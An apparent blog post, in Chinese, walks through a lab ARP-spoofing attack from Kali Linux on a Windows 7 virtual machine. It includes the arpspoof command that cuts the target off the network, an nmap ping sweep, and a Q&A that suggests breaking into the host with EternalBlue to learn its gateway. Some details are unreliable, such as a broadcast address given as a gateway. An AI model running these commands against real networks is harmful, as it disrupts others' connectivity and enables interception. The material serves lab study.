本文介绍了如何在KaliLinux中进行网络攻击,包括提权、安装工具如dsniff、检测网络连通性以及使用arpsspoof进行ARP欺骗。讨论了攻击前提条件,如在同一网段,以及如何获取目标机网关和进行网络扫描。
攻击机:kali IP : 192.168.136.131 网关:192.168.136.255
目标机:win7 IP : 192.168.136.133 网关:192.168.136.2
kali提权:http://t.csdnimg.cn/YED7N
kali安装disniff:apt-get install dsniff
测试攻击机是否联网:ping www.baidu.com
测试目标机是否联网:ping www.baidu.com
测试攻击机是否可以ping通目标机:ping 192.168.136.133
攻击:arpspoof -i eth0 -t 192.168.136.133 192.168.136.2
攻击成功,目标机断网,ping不通百度
停止攻击:Ctrl + Z
问题1:是否只有在同一局域网和同一网段才可以进行攻击
回答:一般情况下,执行 arpspoof 来断网需要目标机器与攻击者在同一局域网(即同一网段)。这是因为 ARP 欺骗攻击利用了局域网中的 ARP 协议。ARP 协议用于将 IP 地址映射到 MAC 地址,以便计算机在局域网中相互通信。
问题2:在同一局域网是否一定具有相同的网关
回答:不是,网关(Gateway)是一个网络与另一个网络通信的节点。在局域网中,网关通常是指连接局域网和广域网的设备,如路由器。在一个局域网(比如:校园网)中,可能会有多个子网,每个子网可能有不同的网关。因此,即使两人同时连接同一个校园网,如果他们所在的子网不同,他们的网关也可能不同。另外,即使两人所在的子网相同,他们的网关也可能不同。因为有些网络管理员会为不同的设备分配不同的网关,以实现网络的负载均衡和管理。
问题3:是否可以修改自己电脑的网关
回答:可以;待测验
问题4:nmap -sP 192.168.136.0/24 好像可以查询局域网下ip为192.168.136.~的主机
回答:namp详解:http://t.csdnimg.cn/6kzGX
nmap只能查主机IP和大网段扫描,网关不能查的
问题5:知道对方的ip,如何获得对方的网关
回答:如果想要确切的网关,就要经过渗透进目标的主机系统,拿到权限后来查。比如永恒之蓝。
扫一扫
1128
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
